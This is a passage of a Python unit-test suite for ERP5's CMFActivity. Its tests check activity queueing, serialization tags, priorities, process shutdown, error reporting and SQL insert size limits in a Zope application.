Validation node is the only\n    non-parallelisable Zope-side task around activities, so it should be kept\n    simple.\n    Deduplication is cheap:\n    - inside the transaction which spawned duplicate activities, because it\n      has to have created activities around anyway, and can keep track\n    - inside the CMFActivity-level processing surrounding activity execution\n      because it has to load the activities to process them anyway\n    \"\"\"\n    if activity == 'SQLQueue':\n      return\n    activity_tool = self.getActivityTool()\n    # Adds two same activities.\n    activity_tool.activate(activity=activity, after_tag='foo', priority=2,\n      tag='a').getId()\n    self.commit()\n    uid1, = [x.uid for x in self.getMessageList(activity)]\n    activity_tool.activate(activity=activity, after_tag='bar', priority=1,\n      tag='a').getId()\n    self.commit()\n    uid2, = [x.uid for x in self.getMessageList(activity) if x.uid != uid1]\n    self.assertEqual(len(activity_tool.getMessageList()), 2)\n    activity_tool.distribute()\n    # After distribute, duplicate is still present.\n    self.assertItemsEqual([uid1, uid2],\n      [x.uid for x in self.getMessageList(activity)])\n    activity_tool.tic()\n\n  def testCheckSQLDictDistributeWithSerializationTagAndGroupMethodId(self):\n    \"\"\"\n    Distribution was at some point buggy in this scenario, when there were\n    activations with the same serialization_tag, once with a group_method_id\n    and once without group_method_id:\n    foo.activate(serialization_tag='a', group_method_id='x').getTitle()\n    foo.activate(serialization_tag='a').getId()\n    \"\"\"\n    def getMessageList():\n      return [\n        (x.activity_kw['serialization_tag'], x.processing_node)\n        for x in activity_tool.getMessageList()\n      ]\n    def activate(serialization_tag='a'):\n      organisation.activate(\n        serialization_tag=serialization_tag,\n        group_method_id='portal_catalog/catalogObjectList',\n      ).getTitle()\n    organisation = self.portal.organisation_module.newContent(portal_type='Organisation')\n    self.tic()\n    activity_tool = self.getActivityTool()\n    activate('a')\n    self.commit()\n    activate('a')\n    self.commit()\n    # Both activities are queued\n    self.assertItemsEqual(\n      getMessageList(),\n      [\n        ('a', -1),\n        ('a', -1),\n      ],\n    )\n    activity_tool.distribute()\n    # Both activities are validated at the same time.\n    # Note: this specific test implementation relies on the absence of\n    # validation-time deduplication which is not strictly related to\n    # serialization_tag behaviour.\n    self.assertItemsEqual(\n      getMessageList(),\n      [\n        ('a', 0),\n        ('a', 0),\n      ],\n    )\n    activate('a')\n    self.commit()\n    activate('b')\n    self.commit()\n    # 3rd & 4th activities queued\n    self.assertItemsEqual(\n      getMessageList(),\n      [\n        ('a', 0),\n        ('a', 0),\n        ('a', -1),\n        ('b', -1),\n      ],\n    )\n    activity_tool.distribute()\n    # 3rd activity does not get validated, 4th is validated\n    self.assertItemsEqual(\n      getMessageList(),\n      [\n        ('a', 0),\n        ('a', 0),\n        ('a', -1),\n        ('b', 0),\n      ],\n    )\n    # 1st, 2nd and 4th are executed, then 3rd gets validated and executed,\n    # and the queue ends empty.\n    self.tic()\n\n  def test_104_interQueuePriorities(self):\n    \"\"\"\n    Important note: there is no way to really reliably check that this\n    feature is correctly implemented, as activity execution order is\n    non-deterministic.\n    The best that can be done is to check that under certain circumstances\n    the activity execution order matches expectations.\n    \"\"\"\n    organisation = self.portal.organisation_module.newContent(portal_type='Organisation')\n    self.tic()\n    activity_tool = self.getActivityTool()\n    check_result_dict = {}\n    def runAndCheck():\n      
check_result_dict.clear()\n self.commit()\n self.assertEqual(len(check_result_dict), 0)\n self.tic()\n self.assertEqual(len(check_result_dict), 2)\n self.assertTrue(check_result_dict['before_ran'])\n self.assertTrue(check_result_dict['after_ran'])\n def mustRunBefore(self):\n check_result_dict['before_ran'] = 'after_ran' not in check_result_dict\n def mustRunAfter(self):\n check_result_dict['after_ran'] = 'before_ran' in check_result_dict\n Organisation.mustRunBefore = mustRunBefore\n Organisation.mustRunAfter = mustRunAfter\n try:\n # Check that ordering looks good (SQLQueue first)\n organisation.activate(activity='SQLQueue', priority=1).mustRunBefore()\n organisation.activate(activity='SQLDict', priority=2).mustRunAfter()\n runAndCheck()\n # Check that ordering looks good (SQLDict first)\n organisation.activate(activity='SQLDict', priority=1).mustRunBefore()\n organisation.activate(activity='SQLQueue', priority=2).mustRunAfter()\n runAndCheck()\n # Check that tag takes precedence over priority (SQLQueue first by priority)\n organisation.activate(activity='SQLQueue', priority=1, after_tag='a').mustRunAfter()\n organisation.activate(activity='SQLDict', priority=2, tag='a').mustRunBefore()\n runAndCheck()\n # Check that tag takes precedence over priority (SQLDict first by priority)\n organisation.activate(activity='SQLDict', priority=1, after_tag='a').mustRunAfter()\n organisation.activate(activity='SQLQueue', priority=2, tag='a').mustRunBefore()\n runAndCheck()\n finally:\n del Organisation.mustRunBefore\n del Organisation.mustRunAfter\n\n @for_each_activity\n def testCheckActivityRuntimeEnvironment(self, activity):\n document = self.portal.organisation_module\n activity_result = []\n def extractActivityRuntimeEnvironment(self):\n activity_result.append(self.getActivityRuntimeEnvironment())\n document.__class__.doSomething = extractActivityRuntimeEnvironment\n try:\n document.activate(activity=activity).doSomething()\n self.commit()\n # Check that getActivityRuntimeEnvironment raises outside of activities\n self.assertRaises(KeyError, document.getActivityRuntimeEnvironment)\n # Check Runtime isolation\n self.tic()\n # Check that it still raises outside of activities\n self.assertRaises(KeyError, document.getActivityRuntimeEnvironment)\n # Check activity runtime environment instance\n env = activity_result.pop()\n self.assertFalse(activity_result)\n message = env._message\n self.assertEqual(message.line.priority, 1)\n self.assertEqual(message.object_path, document.getPhysicalPath())\n self.assertTrue(message.conflict_retry) # default value\n env.edit(max_retry=0, conflict_retry=False)\n self.assertFalse(message.conflict_retry) # edited value\n self.assertRaises(AttributeError, env.edit, foo='bar')\n finally:\n del document.__class__.doSomething\n\n @for_each_activity\n def testSerializationTag(self, activity):\n organisation = self.portal.organisation_module.newContent(portal_type='Organisation')\n self.tic()\n activity_tool = self.getActivityTool()\n # First scenario: activate, distribute, activate, distribute\n # Create first activity and distribute: it must be distributed\n organisation.activate(activity=activity, serialization_tag='1').getTitle()\n self.commit()\n result = activity_tool.getMessageList()\n self.assertEqual(len(result), 1)\n activity_tool.distribute()\n result = activity_tool.getMessageList()\n self.assertEqual(len([x for x in result if x.processing_node == 0]), 1)\n # Create second activity and distribute: it must *NOT* be distributed\n 
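# (at most one message per serialization_tag may be validated at a time,\n # so this one stays at processing_node=-1 until the first is executed)\n 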
organisation.activate(activity=activity, serialization_tag='1').getTitle()\n self.commit()\n result = activity_tool.getMessageList()\n self.assertEqual(len(result), 2)\n activity_tool.distribute()\n result = activity_tool.getMessageList()\n self.assertEqual(len([x for x in result if x.processing_node == 0]), 1) # Distributed message list len is still 1\n self.tic()\n # Second scenario: activate, activate, distribute\n # Both messages must be distributed (this is different from regular tags)\n organisation.activate(activity=activity, serialization_tag='1', priority=2).getTitle()\n # Use a different method just so that SQLDict doesn't merge both activities prior to insertion.\n organisation.activate(activity=activity, serialization_tag='1', priority=1).getId()\n self.commit()\n result = activity_tool.getMessageList()\n self.assertEqual(len(result), 2)\n activity_tool.distribute()\n result = activity_tool.getMessageList()\n # at most 1 activity for a given serialization tag can be validated\n message, = [x for x in result if x.processing_node == 0]\n self.assertEqual(message.method_id, 'getId')\n # the other one is still waiting for validation\n message, = [x for x in result if x.processing_node == -1]\n self.assertEqual(message.method_id, 'getTitle')\n self.tic()\n # Check that giving a None value to serialization_tag does not confuse\n # CMFActivity\n organisation.activate(activity=activity, serialization_tag=None).getTitle()\n self.tic()\n\n def test_110_testAbsoluteUrl(self):\n # Tests that absolute_url works in activities. The URL generation is based\n # on REQUEST information when the method was activated.\n request = self.portal.REQUEST\n\n request.setServerURL('http', 'test.erp5.org', '9080')\n request.other['PARENTS'] = [self.portal.organisation_module]\n request.setVirtualRoot('virtual_root')\n\n calls = []\n def checkAbsoluteUrl(self):\n calls.append(self.absolute_url())\n Organisation.checkAbsoluteUrl = checkAbsoluteUrl\n\n try:\n o = self.portal.organisation_module.newContent(\n portal_type='Organisation', id='test_obj')\n self.assertEqual(o.absolute_url(),\n 'http://test.erp5.org:9080/virtual_root/test_obj')\n o.activate().checkAbsoluteUrl()\n\n # Reset server URL and virtual root before executing messages.\n # This simulates the case of activities being executed with different\n # REQUEST, such as TimerServer.\n # BBB Zope2: port argument below needs to be str in Zope2, but if we provide '443',\n # Zope4 will return absolute_url() with ':443' and Zope2 will return without '443'.\n # This is why we use '444' here.\n request.setServerURL('https', 'anotherhost.erp5.org', '444')\n request.other['PARENTS'] = [self.app]\n request.setVirtualRoot('')\n # obviously, the object url is different\n self.assertEqual(o.absolute_url(),\n 'https://anotherhost.erp5.org:444/%s/organisation_module/test_obj'\n % self.portal.getId())\n\n # but activities are executed using the previous request information\n self.flushAllActivities(loop_size=1000)\n self.assertEqual(calls, ['http://test.erp5.org:9080/virtual_root/test_obj'])\n finally:\n del Organisation.checkAbsoluteUrl\n\n def CheckLocalizerWorks(self, activity):\n FROM_STRING = 'Foo'\n TO_STRING = 'Bar'\n LANGUAGE = 'xx'\n def translationTest(context):\n from Products.ERP5Type.Message import Message\n context.setTitle(context.Base_translateString(FROM_STRING))\n context.setDescription(str(Message('erp5_ui', FROM_STRING)))\n portal = self.portal\n portal.Localizer.erp5_ui.manage_addLanguage(LANGUAGE)\n # Add FROM_STRING to the message catalog\n 
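# (looking up the msgid registers it in the catalog, so that message_edit\n # below can attach a translation to it)\n 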
portal.Localizer.erp5_ui.gettext(FROM_STRING)\n # ...and translate it.\n portal.Localizer.erp5_ui.message_edit(message=FROM_STRING,\n language=LANGUAGE, translation=TO_STRING, note='')\n organisation = portal.organisation_module.newContent(\n portal_type='Organisation')\n self.tic()\n Organisation.translationTest = translationTest\n try:\n REQUEST = organisation.REQUEST\n # Simulate what a browser would have sent to Zope\n REQUEST.environ['HTTP_ACCEPT_LANGUAGE'] = LANGUAGE\n organisation.activate(activity=activity).translationTest()\n self.commit()\n # Remove request parameter to check that it was saved at activate call\n # and restored at message execution.\n del REQUEST.environ['HTTP_ACCEPT_LANGUAGE']\n self.tic()\n finally:\n del Organisation.translationTest\n self.assertEqual(TO_STRING, organisation.getTitle())\n self.assertEqual(TO_STRING, organisation.getDescription())\n\n def test_112_checkLocalizerWorksSQLQueue(self):\n self.CheckLocalizerWorks('SQLQueue')\n\n def test_113_checkLocalizerWorksSQLDict(self):\n self.CheckLocalizerWorks('SQLDict')\n\n def test_114_checkSQLQueueActivitySucceedsAfterActivityChangingSkin(self):\n portal = self.portal\n activity_tool = self.getActivityTool()\n # Check that a reference script can be reached\n script_id = 'ERP5Site_reindexAll'\n self.assertIsNot(getattr(portal, script_id), None)\n # Create a new skin selection\n skin_selection_name = 'test_114'\n portal.portal_skins.manage_skinLayers(add_skin=1, skinpath=[''], skinname=skin_selection_name)\n # Create a dummy document\n organisation = portal.organisation_module.newContent(portal_type='Organisation')\n self.tic()\n # Set custom methods to call as activities.\n def first(context):\n context.changeSkin(skin_selection_name)\n if getattr(context, script_id, None) is not None:\n raise Exception('%s is not supposed to be found here.' 
% script_id)\n def second(context):\n # If the wrong skin is selected this will raise.\n getattr(context, script_id)\n Organisation.firstTest = first\n Organisation.secondTest = second\n try:\n organisation.activate(tag='foo', activity='SQLQueue').firstTest()\n organisation.activate(after_tag='foo', activity='SQLQueue').secondTest()\n self.commit()\n gc.disable()\n self.tic()\n gc.enable()\n # Forcibly restore skin selection, otherwise getMessageList would only\n # emit a log when retrieving the ZSQLMethod.\n portal.changeSkin(None)\n finally:\n del Organisation.firstTest\n del Organisation.secondTest\n\n def test_115_checkProcessShutdown(self):\n # Thread execution plan for this test:\n # main ActivityThread ProcessShutdownThread\n # start ActivityThread None None\n # wait for rendez_vous_lock (run) None\n # wait for rendez_vous_lock release rendez_vous_lock None\n # start ProcessShutdownThread wait for activity_lock None\n # release activity_lock wait for activity_lock internal wait\n # wait for activity_thread (finish) internal wait\n # wait for process_shutdown_thread None (finish)\n #\n # This test only checks that:\n # - activity tool can exit between 2 processable activity batches\n # - activity tool won't process activities after process_shutdown was called\n # - process_shutdown returns before Activity.tic()\n # This is not perfect though, since it would require access to\n # the waiting queue of CMFActivity's internal lock (is_running_lock) to\n # make sure that it's what is preventing process_shutdown from returning.\n activity_tool = self.getActivityTool()\n organisation = self.portal.organisation_module.newContent(\n portal_type='Organisation')\n self.tic()\n activity_event = threading.Event()\n rendez_vous_event = threading.Event()\n def waitingActivity(context):\n # Inform test that we arrived at rendez-vous.\n rendez_vous_event.set()\n # When this event is available, it means test has called process_shutdown.\n assert activity_event.wait(10)\n original_dequeue = SQLDict.dequeueMessage\n queue_tic_test_dict = {}\n def dequeueMessage(self, activity_tool, processing_node, node_family_id_set):\n # This is a one-shot method, revert after execution\n SQLDict.dequeueMessage = original_dequeue\n result = self.dequeueMessage(activity_tool, processing_node, node_family_id_set)\n queue_tic_test_dict['isAlive'] = process_shutdown_thread.isAlive()\n return result\n SQLDict.dequeueMessage = dequeueMessage\n Organisation.waitingActivity = waitingActivity\n try:\n # Use SQLDict with no group method so that both activities won't be\n # executed in the same batch, giving the activity tool a chance to check\n # whether it should stop processing activities.\n organisation.activate(activity='SQLDict', tag='foo').waitingActivity()\n organisation.activate(activity='SQLDict', after_tag='foo').getTitle()\n self.commit()\n self.assertEqual(len(activity_tool.getMessageList()), 2)\n activity_tool.distribute()\n self.commit()\n\n # Start a tic in another thread, so they can meet at rendez-vous.\n class ActivityThread(threading.Thread):\n def run(self):\n # Call changeSkin, since skin selection depends on thread id, and we\n # are in a new thread.\n activity_tool.changeSkin(None)\n activity_tool.tic()\n activity_thread = ActivityThread()\n # Do not try to outlive main thread.\n activity_thread.setDaemon(True)\n # Call process_shutdown in yet another thread because it will wait for\n # running activity to complete before returning, and we need to unlock\n # activity *after* calling process_shutdown 
to make sure the next\n # activity won't be executed.\n class ProcessShutdownThread(threading.Thread):\n def run(self):\n activity_tool.process_shutdown(3, 0)\n process_shutdown_thread = ProcessShutdownThread()\n # Do not try to outlive main thread.\n process_shutdown_thread.setDaemon(True)\n\n activity_thread.start()\n # Wait at rendez-vous for activity to arrive.\n assert rendez_vous_event.wait(10)\n # Initiate shutdown\n process_shutdown_thread.start()\n try:\n # Let waiting activity finish and wait for thread exit\n activity_event.set()\n activity_thread.join(10)\n assert not activity_thread.is_alive()\n process_shutdown_thread.join(10)\n assert not process_shutdown_thread.is_alive()\n # Check that there is still one activity pending\n message_list = activity_tool.getMessageList()\n self.assertEqual(len(message_list), 1)\n self.assertEqual(message_list[0].method_id, 'getTitle')\n # Check that process_shutdown_thread was still running when Queue_tic returned.\n self.assertTrue(queue_tic_test_dict.get('isAlive'), repr(queue_tic_test_dict))\n # Call tic in foreground. This must not lead to activity execution.\n activity_tool.tic()\n self.assertEqual(len(activity_tool.getMessageList()), 1)\n finally:\n # Put activity tool back in a working state\n try:\n cancelProcessShutdown()\n except Exception:\n # If something failed in process_shutdown, shutdown lock might not\n # be taken in CMFActivity, leading to a new exception here hiding\n # test error.\n pass\n finally:\n del Organisation.waitingActivity\n SQLDict.dequeueMessage = original_dequeue\n self.tic()\n\n def test_hasActivity(self):\n active_object = self.portal.organisation_module.newContent(\n portal_type='Organisation')\n active_process = self.portal.portal_activities.newActiveProcess()\n self.tic()\n\n self.assertFalse(active_object.hasActivity())\n self.assertFalse(active_process.hasActivity())\n\n def test(obj, **kw):\n for activity in ActivityTool.activity_dict:\n active_object.activate(activity=activity, **kw).getTitle()\n self.commit()\n self.assertTrue(obj.hasActivity(), activity)\n self.tic()\n self.assertFalse(obj.hasActivity(), activity)\n\n test(active_object)\n test(active_process, active_process=active_process)\n test(active_process, active_process=active_process.getPath())\n\n @for_each_activity\n def test_hasErrorActivity_error(self, activity):\n # Monkey patch Organisation to add a failing method\n def failingMethod(self):\n raise ValueError('This method always fails')\n Organisation.failingMethod = failingMethod\n active_object = self.portal.organisation_module.newContent(\n portal_type='Organisation')\n active_process = self.portal.portal_activities.newActiveProcess()\n self.tic()\n\n self.assertFalse(active_object.hasErrorActivity())\n self.assertFalse(active_process.hasErrorActivity())\n\n active_object.activate(\n activity=activity, active_process=active_process).failingMethod()\n self.commit()\n # assert that an activity was created\n self.assertTrue(active_object.hasActivity())\n self.assertTrue(active_process.hasActivity())\n # assert that no error is reported\n self.assertFalse(active_object.hasErrorActivity())\n self.assertFalse(active_process.hasErrorActivity())\n self.flushAllActivities()\n # assert that the failed activity is still there\n self.assertTrue(active_object.hasActivity())\n self.assertTrue(active_process.hasActivity())\n # assert that an error has been seen\n self.assertTrue(active_object.hasErrorActivity())\n self.assertTrue(active_process.hasErrorActivity())\n message, = 
self.getMessageList(activity)\n self.deleteMessageList(activity, [message])\n\n @for_each_activity\n def test_hasErrorActivity(self, activity):\n active_object = self.portal.organisation_module.newContent(\n portal_type='Organisation')\n active_process = self.portal.portal_activities.newActiveProcess()\n self.tic()\n\n self.assertFalse(active_object.hasErrorActivity())\n self.assertFalse(active_process.hasErrorActivity())\n\n active_object.activate(\n activity=activity, active_process=active_process).getTitle()\n self.commit()\n # assert that an activity was created\n self.assertTrue(active_object.hasActivity())\n self.assertTrue(active_process.hasActivity())\n # assert that no error is reported\n self.assertFalse(active_object.hasErrorActivity())\n self.assertFalse(active_process.hasErrorActivity())\n self.flushAllActivities()\n # assert that no activity is left\n self.assertFalse(active_object.hasActivity())\n self.assertFalse(active_process.hasActivity())\n # assert that no error is reported\n self.assertFalse(active_object.hasErrorActivity())\n self.assertFalse(active_process.hasErrorActivity())\n\n def test_active_object_hasActivity_does_not_catch_exceptions(self):\n \"\"\"\n hasActivity used to do a silent try/except, and this was\n a possible disaster for some projects. Here we make sure that if the\n SQL request fails, the exception is not ignored.\n \"\"\"\n active_object = self.portal.organisation_module.newContent(\n portal_type='Organisation')\n self.tic()\n self.assertFalse(active_object.hasActivity())\n\n # Monkey patch to artificially induce an error in the SQL connection.\n def query(self, query_string, *args, **kw):\n raise ValueError\n\n from Products.ZMySQLDA.db import DB\n DB.original_query = DB.query\n try:\n active_object.activate().getTitle()\n self.commit()\n self.assertTrue(active_object.hasActivity())\n # Make the SQL request fail\n DB.original_query = DB.query\n DB.query = query\n # Then make sure that hasActivity fails\n self.assertRaises(ValueError, active_object.hasActivity)\n finally:\n DB.query = DB.original_query\n del DB.original_query\n self.tic()\n\n def test_insert_max_payload(self):\n activity_tool = self.portal.portal_activities\n # XXX: For unknown reasons, this test runs faster after the tables are\n # recreated. 
We could also make this test run before all others.\n activity_tool.manageClearActivities()\n self.commit()\n max_allowed_packet = activity_tool.getSQLConnection().getMaxAllowedPacket()\n insert_list = []\n invoke_list = []\n N = 100\n class Skip(Exception):\n \"\"\"\n Speed up test by interrupting the first transaction\n as soon as we have the information we want.\n \"\"\"\n original_query = six.get_unbound_function(DB.query)\n def query(self, query_string, *args, **kw):\n if query_string.startswith('INSERT'):\n insert_list.append(len(query_string))\n if not n:\n raise Skip\n return original_query(self, query_string, *args, **kw)\n def check():\n for i in xrange(1, N):\n activity_tool.activate(activity=activity, group_id=str(i)\n ).doSomething(arg)\n activity_tool.activate(activity=activity, group_id='~'\n ).doSomething(' ' * n)\n self.tic()\n self.assertEqual(len(invoke_list), N)\n invoke_list.remove(n)\n self.assertEqual(set(invoke_list), {len(arg)})\n del invoke_list[:]\n activity_tool.__class__.doSomething = \\\n lambda self, arg: invoke_list.append(len(arg))\n try:\n DB.query = query\n for activity in ActivityTool.activity_dict:\n arg = ' ' * (max_allowed_packet // N)\n # Find the size of the last message argument, such that all messages\n # are inserted in a single query whose size is equal to the maximum allowed.\n n = 0\n self.assertRaises(Skip, check)\n self.abort()\n n = max_allowed_packet - insert_list.pop()\n self.assertFalse(insert_list)\n # Now check with the biggest insert query possible.\n check()\n self.assertEqual(max_allowed_packet, insert_list.pop())\n self.assertFalse(insert_list)\n # And check that the insert query is split\n # in order not to exceed max_allowed_packet.\n n += 1\n check()\n self.assertEqual(len(insert_list), 2)\n del insert_list[:]\n finally:\n del activity_tool.__class__.doSomething\n DB.query = original_query\n\n def test_115_TestSerializationTagSQLDictPreventsParallelExecution(self):\n \"\"\"\n Test that when there are multiple activities with the same serialization\n tag, the serialization tag guarantees that only one of them can be\n processed at a time.\n \"\"\"\n portal = self.portal\n activity_tool = portal.portal_activities\n\n # Add 6 activities\n portal.organisation_module.activate(activity='SQLDict', tag='', serialization_tag='test_115').getId()\n self.commit()\n portal.organisation_module.activate(activity='SQLDict', serialization_tag='test_115').getTitle()\n self.commit()\n portal.organisation_module.activate(activity='SQLDict', tag='tag_1', serialization_tag='test_115').getId()\n self.commit()\n portal.person_module.activate(activity='SQLDict', serialization_tag='test_115').getId()\n self.commit()\n portal.person_module.activate(activity='SQLDict', tag='tag_2').getId()\n self.commit()\n portal.organisation_module.activate(activity='SQLDict', tag='', serialization_tag='test_115').getId()\n self.commit()\n\n # distribute and assign them to 3 nodes\n activity_tool.distribute()\n self.commit()\n\n activity = ActivityTool.activity_dict['SQLDict']\n activity.getProcessableMessageList(activity_tool, 1, ())\n self.commit()\n activity.getProcessableMessageList(activity_tool, 2, ())\n self.commit()\n activity.getProcessableMessageList(activity_tool, 3, ())\n self.commit()\n\n result = activity._getMessageList(activity_tool.getSQLConnection())\n try:\n self.assertEqual(len([message\n for message in result\n if (message.processing_node>0 and\n message.serialization_tag=='test_115')]),\n 1)\n\n 
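# The four other 'test_115' messages stay unassigned (processing_node=-1)\n # until the validated one has been processed.\n 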
self.assertEqual(len([message\n for message in result\n if (message.processing_node==-1 and\n message.serialization_tag=='test_115')]),\n 4)\n\n self.assertEqual(len([message\n for message in result\n if (message.processing_node>0 and\n message.serialization_tag=='')]),\n 1)\n finally:\n # Clear activities from all nodes\n self.deleteMessageList('SQLDict', result)\n\n def test_116_RaiseInCommitBeforeMessageExecution(self):\n \"\"\"\n Test behaviour of CMFActivity when the commit just before message\n execution fails. In particular, it should restart the messages it\n selected (processing_node=current_node) instead of ignoring them forever.\n \"\"\"\n processed = []\n activity_tool = self.portal.portal_activities\n activity_tool.__class__.doSomething = processed.append\n try:\n for activity in ActivityTool.activity_dict:\n activity_tool.activate(activity=activity).doSomething(activity)\n self.commit()\n # Make first commit in dequeueMessage raise\n registerFailingTransactionManager()\n self.assertRaises(CommitFailed, activity_tool.tic)\n # Normally, the request stops here and Zope aborts the transaction\n self.abort()\n self.assertEqual(processed, [])\n # Activity is already reserved for current node. Check tic reselects it.\n activity_tool.tic()\n self.assertEqual(processed, [activity])\n del processed[:]\n finally:\n del activity_tool.__class__.doSomething\n\n def test_117_PlacelessDefaultReindexParameters(self):\n \"\"\"\n Test behaviour of PlacelessDefaultReindexParameters.\n \"\"\"\n portal = self.portal\n\n # Make a new Person object to make sure that the portal type\n # is migrated to an instance of a portal type class, otherwise\n # the portal type may generate an extra active object.\n portal.person_module.newContent(portal_type='Person')\n self.tic()\n\n original_reindex_parameters = portal.getPlacelessDefaultReindexParameters()\n if original_reindex_parameters is None:\n original_reindex_parameters = {}\n\n tag = 'SOME_RANDOM_TAG'\n activate_kw = original_reindex_parameters.get('activate_kw', {}).copy()\n activate_kw['tag'] = tag\n portal.setPlacelessDefaultReindexParameters(activate_kw=activate_kw, \\\n **original_reindex_parameters)\n current_default_reindex_parameters = portal.getPlacelessDefaultReindexParameters()\n self.assertEqual({'activate_kw': {'tag': tag}}, \\\n current_default_reindex_parameters)\n person = portal.person_module.newContent(portal_type='Person')\n self.commit()\n # as we specified it in setPlacelessDefaultReindexParameters we should have\n # an activity with this tag\n self.assertEqual(1, portal.portal_activities.countMessageWithTag(tag))\n self.tic()\n self.assertEqual(0, portal.portal_activities.countMessageWithTag(tag))\n\n # restore the original ones\n portal.setPlacelessDefaultReindexParameters(**original_reindex_parameters)\n person = portal.person_module.newContent(portal_type='Person')\n # ... 
now no messages with this tag should appear\n self.assertEqual(0, portal.portal_activities.countMessageWithTag(tag))\n\n @for_each_activity\n def testTryNotificationSavedOnEventLogWhenNotifyUserRaises(self, activity):\n obj = self.portal.organisation_module.newContent(portal_type='Organisation')\n self.tic()\n original_notifyUser = six.get_unbound_function(Message.notifyUser)\n def failSendingEmail(self, *args, **kw):\n raise MailHostError('Mail is not sent')\n activity_unit_test_error = Exception()\n def failingMethod(self):\n raise activity_unit_test_error\n try:\n Message.notifyUser = failSendingEmail\n Organisation.failingMethod = failingMethod\n self._catch_log_errors()\n obj.activate(activity=activity, priority=6).failingMethod()\n self.commit()\n self.flushAllActivities(silent=1, loop_size=100)\n message, = self.getMessageList(activity)\n self.commit()\n for log_record in self.logged:\n if log_record.name == 'ActivityTool' and log_record.levelname == 'WARNING':\n type, value, trace = log_record.exc_info\n self.commit()\n self.assertIs(activity_unit_test_error, value)\n self.deleteMessageList(activity, [message])\n finally:\n Message.notifyUser = original_notifyUser\n del Organisation.failingMethod\n self._ignore_log_errors()\n\n @for_each_activity\n def testNotificationFailureIsNotSavedOnEventLogWhenMailNotificationIsDisabled(self, activity):\n obj = self.portal.organisation_module.newContent(portal_type='Organisation')\n self.tic()\n original_notifyUser = six.get_unbound_function(Message.notifyUser)\n def failSendingEmail(self, *args, **kw):\n raise MailHostError('Mail is not sent')\n activity_unit_test_error = Exception()\n def failingMethod(self):\n raise activity_unit_test_error\n try:\n self.portal.portal_activities.activity_failure_mail_notification = False\n Message.notifyUser = failSendingEmail\n Organisation.failingMethod = failingMethod\n self._catch_log_errors()\n obj.activate(activity=activity, priority=6).failingMethod()\n self.commit()\n self.flushAllActivities(silent=1, loop_size=100)\n message, = self.getMessageList(activity)\n self.commit()\n for log_record in self.logged:\n if log_record.name == 'ActivityTool' and log_record.levelname == 'WARNING':\n type, value, trace = log_record.exc_info\n self.commit()\n self.assertIs(activity_unit_test_error, value)\n self.deleteMessageList(activity, [message])\n finally:\n self.portal.portal_activities.activity_failure_mail_notification = True\n Message.notifyUser = original_notifyUser\n del Organisation.failingMethod\n self._ignore_log_errors()\n\n @for_each_activity\n def testTryUserMessageContainingNoTracebackIsStillSent(self, activity):\n # With Message.__call__\n # 1: activity context does not exist when activity is executed\n obj = self.portal.organisation_module.newContent(portal_type='Organisation')\n self.tic()\n notification_done = []\n def fake_notifyUser(self, *args, **kw):\n notification_done.append(True)\n self.traceback = None\n original_notifyUser = Message.notifyUser\n def failingMethod(self):\n raise ValueError(\"This method always fails\")\n Message.notifyUser = fake_notifyUser\n Organisation.failingMethod = failingMethod\n try:\n obj.activate(activity=activity).failingMethod()\n self.commit()\n self.flushAllActivities(silent=1, loop_size=100)\n message, = self.getMessageList(activity)\n self.assertEqual(len(notification_done), 1)\n self.assertEqual(message.traceback, None)\n message(self.getActivityTool())\n self.deleteMessageList(activity, [message])\n finally:\n Message.notifyUser = 
original_notifyUser\n del Organisation.failingMethod\n\n @for_each_activity\n def testTryNotificationSavedOnEventLogWhenSiteErrorLoggerRaises(self, activity):\n # Make sure that no active object is installed.\n o = self.getOrganisation()\n class ActivityUnitTestError(Exception):\n pass\n activity_unit_test_error = ActivityUnitTestError()\n def failingMethod(self):\n raise activity_unit_test_error\n from Products.SiteErrorLog.SiteErrorLog import SiteErrorLog\n original_raising = six.get_unbound_function(SiteErrorLog.raising)\n\n # Monkey patch Site Error to induce conflict errors artificially.\n def raising(self, info):\n raise AttributeError\n try:\n SiteErrorLog.raising = raising\n Organisation.failingMethod = failingMethod\n self._catch_log_errors()\n o.activate(activity = activity).failingMethod()\n self.commit()\n message, = self.getMessageList(activity)\n self.flushAllActivities(silent = 1)\n SiteErrorLog.raising = original_raising\n self.commit()\n for log_record in self.logged:\n if log_record.name == 'ActivityTool' and log_record.levelname == 'WARNING':\n type, value, trace = log_record.exc_info\n self.assertIs(activity_unit_test_error, value)\n self.deleteMessageList(activity, [message])\n finally:\n SiteErrorLog.raising = original_raising\n del Organisation.failingMethod\n self._ignore_log_errors()\n\n def test_128_CheckDistributeWithSerializationTagAndGroupMethodId(self):\n activity_tool = self.portal.portal_activities\n obj1 = activity_tool.newActiveProcess()\n obj2 = activity_tool.newActiveProcess()\n self.tic()\n group_method_call_list = []\n def doSomething(self, message_list):\n r = []\n for m in message_list:\n m.result = r.append((m.object.getPath(), m.args, m.kw))\n r.sort()\n group_method_call_list.append(r)\n activity_tool.__class__.doSomething = doSomething\n try:\n for activity in ActivityTool.activity_dict:\n activity_kw = dict(activity=activity, serialization_tag=self.id(),\n group_method_id='portal_activities/doSomething')\n obj1.activate(**activity_kw).dummy(1, x=None)\n obj2.activate(**activity_kw).dummy(2, y=None)\n self.commit()\n activity_tool.distribute()\n activity_tool.tic()\n self.assertEqual(group_method_call_list.pop(),\n sorted([(obj1.getPath(), (1,), dict(x=None)),\n (obj2.getPath(), (2,), dict(y=None))]))\n self.assertFalse(group_method_call_list)\n self.assertFalse(activity_tool.getMessageList())\n obj1.activate(priority=2, **activity_kw).dummy1(1, x=None)\n obj1.activate(priority=1, **activity_kw).dummy2(2, y=None)\n message1 = obj1.getPath(), (1,), dict(x=None)\n message2 = obj1.getPath(), (2,), dict(y=None)\n self.commit()\n activity_tool.distribute()\n self.assertEqual(len(activity_tool.getMessageList()), 2)\n activity_tool.tic()\n self.assertEqual(group_method_call_list.pop(),\n [message2] if activity != 'SQLQueue' else [message1, message2])\n self.assertFalse(group_method_call_list)\n finally:\n del activity_tool.__class__.doSomething\n\n def test_129_beforeCommitHook(self):\n \"\"\"\n Check it is possible to activate an object from a before commit hook\n \"\"\"\n def doSomething(person):\n person.activate(activity='SQLDict')._setFirstName('John')\n person.activate(activity='SQLQueue')._setLastName('Smith')\n person = self.portal.person_module.newContent()\n transaction.get().addBeforeCommitHook(doSomething, (person,))\n self.tic()\n self.assertEqual(person.getTitle(), 'John Smith')\n\n def test_connection_migration(self):\n \"\"\"\n Make sure the cmf_activity_sql_connection is automatically migrated from\n the ZMySQLDA Connection class to 
